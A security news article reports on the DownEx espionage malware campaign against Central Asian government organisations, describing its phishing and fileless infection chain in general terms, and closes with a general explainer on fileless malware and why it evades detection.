DownEx Malware Used in Espionage Campaign

A new type of malware called DownEx has been discovered by Romanian cybersecurity researchers.

It is being used in a sophisticated espionage campaign that is targeting government organizations in Central Asia, with evidence suggesting the involvement of Russia-based threat actors. The attacks are carried out through spear-phishing emails containing a booby-trapped payload, which is disguised as a Microsoft Word file.

Once the attachment is opened, a decoy document is displayed while a malicious HTML application runs in the background. This HTA file is designed to establish contact with a remote command-and-control server to retrieve a next-stage payload, which is believed to be a backdoor for establishing persistence. The attackers also use custom tools for post-exploitation activities, including C/C++-based binaries to enumerate network resources, a Python script to receive instructions to steal files, delete other malware, and capture screenshots, and a C++-based malware called DownEx to exfiltrate files to the C2 server.

Two other variants of DownEx have also been discovered. Researchers further noted that this is a fileless attack, which means the malicious script only exists in memory and never makes it onto the victim's drives.

What is Fileless Malware and What Makes it Particularly Dangerous?

Fileless malware is a type of malicious software that operates in a computer's memory, without leaving any traces on the hard drive. This makes it particularly difficult to detect and remove using traditional antivirus software because there are no files to scan. Instead of relying on a file or executable, fileless malware is often delivered through techniques such as social engineering, exploits, or malicious macros in documents.

One of the key characteristics of fileless malware is that it uses legitimate programs or tools already present on the system, such as PowerShell or Windows Management Instrumentation (WMI), to carry out its malicious activities. By doing this, fileless malware can blend in with legitimate system activity and evade detection by traditional antivirus software.

Another reason fileless malware is particularly dangerous is that it can often bypass endpoint protection measures such as firewalls, intrusion detection and prevention systems (IDS/IPS), and other security tools that rely on file-based signatures or pattern-matching algorithms. Additionally, because it doesn't write anything to disk, it can remain undetected for longer periods of time and has a greater chance of achieving its objectives before being discovered.

Fileless malware is often used in targeted attacks, such as those against financial institutions or other high-value targets, where the goal is to gain access to sensitive information or systems. It can also be used for more widespread attacks, such as ransomware campaigns, where the attackers are looking to infect as many systems as possible.